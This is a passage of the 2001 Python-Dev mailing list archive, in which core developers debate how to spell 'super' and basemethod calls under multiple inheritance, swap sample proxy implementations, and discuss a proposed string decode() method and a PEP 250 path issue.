AttributeError,'method %s' % name -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 2 16:06:39 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:06:39 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
<200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> Message-ID: <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> /F: > guido wrote: > > > > class MyClass (BaseClass): > > > def foo (self, arg1, arg2): > > > super.foo(arg1, arg2) > > > > I'm sure that's everybody's favorite way to spell it! > > not mine. my brain contains far too much Python 1.5.2 code > for it to accept that some variables are dynamically scoped, > while others are lexically scoped. > > why not spell it out: > > self.__super__.foo(arg1, arg2) > > or > > self.super.foo(arg1, arg2) > > or > > super(self).foo(arg1, arg2) IMO we still need to specify the class, and there we are: super(self, MyClass).foo(arg1, arg2) Thomas From guido at digicool.com Wed May 2 17:11:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:11:17 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:02:41 +0200." <3AF01381.592AE31B@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> Message-ID: <200105021511.KAA32271@cj20424-a.reston1.va.home.com> > Guido van Rossum wrote: > > > > > This doesn't work in Python since Python has multiple inheritence, > > > e.g. super in > > > > > > class A(B,C): > > > def foo(self): > > > super.foo() > > > > > > is ambiguous. > > > > I'm not sure what you mean. The search is totally well-defined: first > > search B for a foo method, then search C. > > I thought you were talking about an abstract super class which is > how Java uses this term. Ah. I didn't realize. 
This would suggest that another (not yet mentioned) suggestion would be to spell the basemethod call as super.foo(self) keeping more in line with the tradition of passing self explicitly when calling basemethods. > Rereading some of the posts, I think you are indeed referring to > the method which foo overrides -- this is what I call basemethod > (since it is implemented in one of the base classes). Aha. > > > I'd rather suggest adding a function for finding the basemethod > > > of a method. This is probably the most common task in this context. > > > > I've never heard of the concept of basemethod, but if I may venture a > > guess, it would be the same definition as I give above. > > The basemethod can be defined as the first method of the same name > found in the inheritance tree using the standard Python lookup > strategy (left-right, depth first) when continuing the lookup search > at the node in the inheritance tree which defines the method querying > the basemethod. Yes, that's what I guessed. > In other words: you let Python continue the search for the method > as if it hadn't found the occurrence calling the basemethod() > API. Hmm, still not clear enough... better let Tim jump in here > (we've had a discussion about basemethod() some months or years > ago). Tim ? > > Note that there are many ways of defining what a basemethod > is, due to the ambiguities that are caused by multiple inheritance > (e.g. the same base class may appear in different branches of the > inheritance tree). Well, the search will find one definite method, but you're right that there may be situations where it's necessary to specify the specific base class! In C++ that is solved by writing B::foo() or C::foo(). Python doesn't have "::" and instead overloads the "." operator. Hmm, so even introducing super doesn't completely remove the need to be able to write C.foo to reference the unbound method foo of class C, and this may require that my ugly rule still be needed.
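The explicit spelling that stays necessary under multiple inheritance can be sketched in modern Python 3 (the class names are hypothetical). Naming the base class is the Python counterpart of C++'s B::foo(); the built-in super() that later Python versions added follows only the single lookup order:

```python
class B:
    def foo(self):
        return "B.foo"


class C:
    def foo(self):
        return "C.foo"


class A(B, C):
    def foo(self):
        # Name each base explicitly, like B::foo() and C::foo() in C++.
        return [B.foo(self), C.foo(self)]

    def next_foo(self):
        # super() follows A's method resolution order, so it finds B.foo first.
        return super().foo()


a = A()
print(a.foo())       # ['B.foo', 'C.foo']
print(a.next_foo())  # B.foo
```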
AFAIK, Smalltalk has only single inheritance, and so does Java, so there 'super' is enough. Will we need to add a "::" operator to Python??? --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 2 17:19:07 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:19:07 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:04:29 +0200." <3AF013ED.8A190FE2@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF013ED.8A190FE2@lemburg.com> Message-ID: <200105021519.KAA32312@cj20424-a.reston1.va.home.com> > Here's an implementation of what I currently use to track down > the basemethod (taken from mx.Tools): How am I supposed to use this? I tried this: class B: def foo(self): print "B.foo" class C(B): def foo(self): print "C.foo" B.foo(self) print basemethod(self.foo) # Expect this to be B.foo class D(C): def foo(self): print "D.foo" C.foo(self) d = D() d.foo() but the call to basemethod(self.foo) in C prints C.foo, not B.foo as required. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 2 17:23:33 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:23:33 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 14:48:20 +1200." <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> References: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Message-ID: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> > > Except that sometimes you really do want x.__class__.__classdict__ to > > have priority (e.g. for "guarded" attributes). 
> > What's a "guarded" attribute? I meant an attribute that's implemented by a pair of get and set functions. This is very useful; my proposed design lets you define this more directly rather than requiring you to override __getattr__ and __setattr__. > > But the issue of backwards compatibility is a big one here > > I was thinking that, while this is still in the __future__, > the __dict__ attribute would be a pseudo-dict that, by > default, behaves like the union of the old __dict__ and > the __classdict__. Actually, I think that what's in the __dict__ is just perfect; it's the definition of getattr(classobject, name) where name is both an instance and a class method that causes trouble. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 16:29:20 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:29:20 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF013ED.8A190FE2@lemburg.com> <200105021519.KAA32312@cj20424-a.reston1.va.home.com> Message-ID: <3AF019C0.716E6D35@lemburg.com> Guido van Rossum wrote: > > > Here's an implementation of what I currently use to track down > > the basemethod (taken from mx.Tools): > > How am I supposed to use this? > > I tried this: > > class B: > def foo(self): > print "B.foo" > > class C(B): > def foo(self): > print "C.foo" > B.foo(self) > print basemethod(self.foo) # Expect this to be B.foo This finds the basemethod of self.foo meaning the method overridden by D.foo. 
To get at the basemethod of C.foo, you'd have to call basemethod(self, C.foo) Note that the intent here is to be able to call basemethods even in case the defining class is only mixin class -- a very common situation at least in many of my applications (keeps inheritance trees shallow and increases readability of the code). > class D(C): > def foo(self): > print "D.foo" > C.foo(self) > > d = D() > d.foo() > > but the call to basemethod(self.foo) in C prints C.foo, not B.foo as > required. > > --Guido van Rossum (home page: http://www.python.org/~guido/) > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > http://mail.python.org/mailman/listinfo/python-dev -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at effbot.org Wed May 2 16:15:58 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 16:15:58 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> Message-ID: <002c01c0d312$6a195110$e46940d5@hagrid> thomas wrote: > > why not spell it out: > > > > self.__super__.foo(arg1, arg2) > > > > or > > > > self.super.foo(arg1, arg2) > > > > or > > > > super(self).foo(arg1, arg2) > > IMO we still need to specify the class, and there we are: > > super(self, MyClass).foo(arg1, arg2) isn't that the same as self.__class__ ? 
in which case super is something like: import new class super: def __init__(self, instance): self.instance = instance def __getattr__(self, name): for klass in self.instance.__class__.__bases__: member = getattr(klass, name, None) if member: if callable(member): return new.instancemethod(member, self.instance, klass) return member raise AttributeError(name) (I'm even more confused than my pythonware.com colleague) Cheers /F From donb at abinitio.com Wed May 2 16:41:14 2001 From: donb at abinitio.com (Donald Beaudry) Date: Wed, 02 May 2001 10:41:14 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <200105021441.KAA08444@localhost.localdomain> Guido van Rossum wrote, > [Greg Ward, welcome back!] > > * 'super' is a magic object that only makes sense inside a 'def' > > inside a 'class' (at least for now; perhaps it could be generalized > > to work at class scope as well as method scope, but let's keep > > it simple) > > Yes, that's about the only way it can be made to work. The compiler > will have to (1) detect that 'super' is a free variable, and (2) make > it a local and initialize it with the proper magic. Or, to relieve > the burden from the symbol table, we could make super a keyword, at > the cost of breaking existing code. I'm not at all sure I like the idea of 'super'. It's far more magic than I am used to (coming from Python at least). Currently, we spell 'super' like this: class foo(bar): def __repr__(self): return bar.__repr__(self) # that's super! I like the explicit nature of it. As Guido points out however, this ends up being ambiguous when we try to make classes more "instance-like". Now, how do I like to spell super?
class foo(bar): def __repr__(self): return bar._.__repr__(self) # now that's really super! or, for those who like the "keyword": class foo(bar): def __repr__(self): super = bar._ return super.__repr__(self) The trick here is in the implementation of getattr on the '_'. It returns a proxy object for the class. When attributes are accessed through it, a different search path is taken. This path is the same path that would be taken by instance attribute lookup. In my code, I refer to this object as the 'unbound instance'. Since accessing a function through this object will yield an unbound instance method, the name makes sense to me. -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...So much code, so little time... From thomas.heller at ion-tof.com Wed May 2 16:49:02 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:49:02 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <075101c0d317$07516fe0$e000a8c0@thomasnotebook> > thomas wrote: > > > > why not spell it out: > > > > > > self.__super__.foo(arg1, arg2) > > > > > > or > > > > > > self.super.foo(arg1, arg2) > > > > > > or > > > > > > super(self).foo(arg1, arg2) > > > > IMO we still need to specify the class, and there we are: > > > > super(self, MyClass).foo(arg1, arg2) > > isn't that the same as self.__class__ ?
in which case > super is something like: > > import new > > class super: > def __init__(self, instance): > self.instance = instance > def __getattr__(self, name): > for klass in self.instance.__class__.__bases__: > member = getattr(klass, name, None) > if member: > if callable(member): > return new.instancemethod(member, self.instance, klass) > return member > raise AttributeError(name) > No, it's not the same. Consider: class X: def test(self): print "test X" class Y(X): def test(self): print "test Y" super(self).test() class Z(Y): pass X().test() print Y().test() print Z().test() print This prints: test X test Y test X test Y test Y (more test Y lines deleted) Runtime error: maximum recursion depth exceeded This is because super(self).test for the Z() object should start the search in the X class, not in the Y class. Thomas From thomas.heller at ion-tof.com Wed May 2 16:53:17 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:53:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <078f01c0d317$9f6a5b70$e000a8c0@thomasnotebook> This implementation of super works correctly: import new class super: def __init__(self, instance, klass): self.instance = instance self.klass = klass def __getattr__(self, name): for klass in (self.klass,) + self.klass.__bases__: member = getattr(klass, name, None) if member: if callable(member): return new.instancemethod(member, self.instance, klass) return member raise AttributeError(name) class X: def test(self): print "test X" class Y(X): def test(self): 
print "test Y" super(self, X).test() class Z(Y): pass X().test() print Y().test() print Z().test() print Thomas From donb at abinitio.com Wed May 2 17:31:45 2001 From: donb at abinitio.com (Donald Beaudry) Date: Wed, 02 May 2001 11:31:45 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> <200105021511.KAA32271@cj20424-a.reston1.va.home.com> Message-ID: <200105021531.LAA08940@localhost.localdomain> Guido van Rossum wrote, > AFAIK, Smalltalk has only single inheritance, and so does Java, so > there 'super' is enough. Will we need to add a "::" operator to > Python??? Multiple inheritance introduces a potential wrinkle in my definition of the unbound instance. The problem is that the search starts one level too high. That is in: class foo(b1, b2): def __repr__(self): super = b1._ #this one super = b2._ #or this one? return super.__repr__(self) we don't know which base class to choose as the starting point for the search. This problem already exists. Now, if we want to avoid it, this: class foo(b1, b2): def __repr__(self): super = foo.__super__ return super.__repr__(self) comes to mind. -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...Will hack for sushi...
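The `foo.__super__` idea and Thomas's corrected super class both amount to starting the lookup just after the calling class. A minimal sketch in modern Python 3, assuming a hypothetical `SuperProxy` helper: unlike Thomas's version, which is handed the base class to start from, it is handed the calling class, and it walks the instance's C3 method resolution order (`__mro__`) rather than the classic depth-first order:

```python
class SuperProxy:
    """Hypothetical helper: look names up after `cls` in type(instance).__mro__."""

    def __init__(self, cls, instance):
        self._cls = cls
        self._instance = instance

    def __getattr__(self, name):
        mro = type(self._instance).__mro__
        # Skip everything up to and including the class that is doing the calling.
        for klass in mro[mro.index(self._cls) + 1:]:
            if name in vars(klass):
                attr = vars(klass)[name]
                # Bind functions (and other descriptors) to the original instance.
                if hasattr(attr, "__get__"):
                    return attr.__get__(self._instance, type(self._instance))
                return attr
        raise AttributeError(name)


class X:
    def test(self):
        return ["X"]


class Y(X):
    def test(self):
        return ["Y"] + SuperProxy(Y, self).test()


class Z(Y):
    pass


print(Z().test())  # ['Y', 'X'], with no runaway recursion
```

Because the starting point is tied to the class that wrote the call rather than to `self.__class__`, the Z instance no longer loops back into Y.test. In modern Python the built-in `super(Y, self).test()` gives the same result for this example.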
From donb at abinitio.com Wed May 2 17:37:39 2001 From: donb at abinitio.com (Donald Beaudry) Date: Wed, 02 May 2001 11:37:39 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> Message-ID: <200105021537.LAA09063@localhost.localdomain> "Fredrik Lundh" wrote, > thomas wrote: > > > > why not spell it out: > > > > > > self.__super__.foo(arg1, arg2) > > > > > > or > > > > > > self.super.foo(arg1, arg2) > > > > > > or > > > > > > super(self).foo(arg1, arg2) > > > > IMO we still need to specify the class, and there we are: > > > > super(self, MyClass).foo(arg1, arg2) > > isn't that the same as self.__class__ ? in which case > super is something like: super is a lexically scoped concept. You can't ask the instance for it since its value is different depending on where it is needed. Just as: class foo(bar): def __repr__(self): return self.__class__.__repr__(self) would get you into an infinite loop, while: class foo(bar): def __repr__(self): return bar.__repr__(self) won't. Now, don't go thinking that class foo(bar): def __repr__(self): return self.__class__.__bases__[0].__repr__(self) will do you any good either ;) Because it won't! -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb at init.com Lexington, MA 02421 ...So much code, so little time... From guido at digicool.com Wed May 2 19:02:19 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 12:02:19 -0500 Subject: [Python-Dev] Unicode and the Windows file system. In-Reply-To: Your message of "Fri, 27 Apr 2001 00:26:39 +1000."
References: Message-ID: <200105021702.MAA01317@cj20424-a.reston1.va.home.com> > Now that 2.1 is out the door, how do we feel about getting these Unicode > changes in? > > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 No problem for me, although the context-sensitive semantics of the MBCS encoding still elude me. (Who cares, it's Windows. :-) Are you & MAL capable of sorting this out? Do you want me to add a +1 comment to the tracker? --Guido van Rossum (home page: http://www.python.org/~guido/) From gmcm at hypernet.com Wed May 2 18:01:20 2001 From: gmcm at hypernet.com (Gordon McMillan) Date: Wed, 2 May 2001 12:01:20 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> References: Your message of "Wed, 02 May 2001 14:48:20 +1200." <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Message-ID: <3AEFF710.9471.8025D7EA@localhost> Hmmm. Some time ago, Tim asked the question: "Why do you want this stuff?". As far as I can recall, he got 2 answers: "So I don't have to 'initialize(Klass)'" and "me, too". I don't think those qualify as answers. Some time ago (cf, types-sig brouhaha of a couple years ago) I concluded that the only purpose for this stuff was __getattr__ and __setattr__ hacks. I reached this conclusion by going nutzo using (Guido's) metaclass hook, and studying the available uses of ExtensionClass (I could find no public usage of Don's elegant madness). I rather liked Guido's "Turtles all the way down" (but his description was so cryptic that my interpretation may have been a hallucination), and I suspect he's still headed that way. Nonetheless, I would like to see this discussion of the elegance of Smalltalk's incompatible model (and how to fudge it in Python) balanced by some discussion of the expected pragmatic benefits. (That's a different topic from subclassing types.)
start-with-"if-God-wanted-metaclasses-he-wouldn't-have- invented-proxies"--ly y'rs - Gordon From fredrik at effbot.org Wed May 2 17:47:08 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 17:47:08 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain> Message-ID: <00a901c0d31f$2797a370$e46940d5@hagrid> Donald Beaudry wrote: > super is a lexically scoped concept. You cant ask the instance for it > since it's value is different depending on in which it is needed oh, you want people to be able to inherit from classes using super? guess we'll have to use sys._getframe().f_back.f_method.im_class instead, then ;-) (any special reason why frame objects don't contain a pointer to the corresponding function/method object?) Cheers /F From mal at lemburg.com Wed May 2 18:11:50 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 18:11:50 +0200 Subject: [Python-Dev] Unicode and the Windows file system. References: <200105021702.MAA01317@cj20424-a.reston1.va.home.com> Message-ID: <3AF031C6.324D25D5@lemburg.com> Guido van Rossum wrote: > > > Now that 2.1 is out the door, how do we feel about getting these Unicode > > changes in? > > > > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 > > No problem for me, although the context-sensitive semantics of the > MBCS encoding still elude me. (Who cares, it's Windows. :-) > > Are you & MAL capable of sorting this out? Do you want me to add a +1 > comment to the tracker? 
I'll take care of the parser marker stuff and Mark can do the rest ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 19:17:50 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 12:17:50 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 17:47:08 +0200." <00a901c0d31f$2797a370$e46940d5@hagrid> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain> <00a901c0d31f$2797a370$e46940d5@hagrid> Message-ID: <200105021717.MAA01518@cj20424-a.reston1.va.home.com> > (any special reason why frame objects don't contain a > pointer to the corresponding function/method object?) Because (until now) there was no need. The frame needs to know about the code object, but the rest of the function's context is not needed. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 20:13:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 20:13:17 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! Message-ID: <3AF04E3D.45AE4F4B@lemburg.com> We already have "data".encode(encoding) which encodes the string data by passing it through the encoder of the given encoding. Wouldn't it be worthwhile to add direct access to codec decoders through string methods as well ? (Note that this addition only makes sense for string objects, since Unicode cannot be decoded.) 
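For comparison, a sketch of how such content-transfer transforms look in modern Python 3, where the str/bytes split changed the picture: binary-to-binary codecs such as "base64" and "zlib" are reached through `codecs.encode()` and `codecs.decode()` rather than through string methods. The payload is made up for illustration:

```python
import codecs

data = b"binary \x00\x01\x02 payload"

# base64: bytes in, bytes out, in both directions.
text = codecs.encode(data, "base64")
restored = codecs.decode(text, "base64")

# zlib compression is exposed through the same encode/decode pair.
packed = codecs.encode(data, "zlib")
unpacked = codecs.decode(packed, "zlib")

print(restored == data, unpacked == data)  # True True
```

The symmetric pair is what the proposed `.decode()` method would mirror on the object itself.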
Also, would there be any objections adding some more standard codecs to the system ? I'm thinking of wrapping the binascii module APIs in form of codecs... -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 21:18:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 14:18:26 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 20:13:17 +0200." <3AF04E3D.45AE4F4B@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> Message-ID: <200105021918.OAA03080@cj20424-a.reston1.va.home.com> > We already have "data".encode(encoding) which encodes the string data > by passing it through the encoder of the given encoding. > > Wouldn't it be worthwhile to add direct access to codec decoders > through string methods as well ? > > (Note that this addition only makes sense for string objects, > since Unicode cannot be decoded.) > > Also, would there be any objections adding some more standard > codecs to the system ? I'm thinking of wrapping the binascii > module APIs in form of codecs... Can you provide examples of where this can't be done using the existing approach? Code-bloat police anyone? --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 20:32:46 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 20:32:46 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> Message-ID: <3AF052CE.E928BDA1@lemburg.com> Guido van Rossum wrote: > > > We already have "data".encode(encoding) which encodes the string data > > by passing it through the encoder of the given encoding. > > > > Wouldn't it be worthwhile to add direct access to codec decoders > > through string methods as well ? 
> > > > (Note that this addition only makes sense for string objects, > > since Unicode cannot be decoded.) > > > > Also, would there be any objections adding some more standard > > codecs to the system ? I'm thinking of wrapping the binascii > > module APIs in form of codecs... > > Can you provide examples of where this can't be done using the > existing approach? There is no existing elegant approach except hooking up to the codecs directly. Adding .decode() is really a matter of adding symmetry. Here are some example of how these two codec methods could be used: xmltext = binarydata.encode('base64') ... binarydata = xmltext.decode('base64') zzz = data.encode('gzip') ... data = zzz.decode('gzip') jpegimage = gifimage.decode('gif').encode('jpeg') mp3audio = wavaudio.decode('wav').encode('mp3') etc. Basically all content transfer encodings can take advantage of these two methods. It's not really code bloat, BTW, since the C API is there; the .decode() method would just expose it. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 21:38:10 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 14:38:10 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 20:32:46 +0200." <3AF052CE.E928BDA1@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> Message-ID: <200105021938.OAA03550@cj20424-a.reston1.va.home.com> > > Can you provide examples of where this can't be done using the > > existing approach? > > There is no existing elegant approach except hooking up to the > codecs directly. Adding .decode() is really a matter of adding > symmetry. Yes, but symmetry is good except when it isn't. 
:-) > Here are some example of how these two codec methods could > be used: > > xmltext = binarydata.encode('base64') > ... > binarydata = xmltext.decode('base64') > > zzz = data.encode('gzip') > ... > data = zzz.decode('gzip') > > jpegimage = gifimage.decode('gif').encode('jpeg') > > mp3audio = wavaudio.decode('wav').encode('mp3') > > etc. How would you do this currently? > Basically all content transfer encodings can take advantage of > these two methods. > > It's not really code bloat, BTW, since the C API is there; > the .decode() method would just expose it. Show me the patch and I'll decide whether it's code bloat. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at effbot.org Wed May 2 20:20:24 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 20:20:24 +0200 Subject: [Python-Dev] PEP 250 buglet Message-ID: <004b01c0d334$8f600a50$e46940d5@hagrid> PEP 250 suggests changing the sitedirs setup in site.py from sitedirs = [prefix] to sitedirs == [makepath(prefix, "lib", "site-packages")] on windows. it then goes on to say that This change does not preclude packages using the current location -- the change only adds a directory to sys.path, it does not remove anything. this isn't true (even after correcting the typo), since the sitedirs list isn't only added to the path; it's also used to look for PTH files. after this change, PTH files located under prefix will no longer be found. the following change works a bit better: sitedirs = [prefix, makepath(prefix, "lib", "site-packages")] Cheers /F From mal at lemburg.com Wed May 2 21:55:25 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 21:55:25 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! 
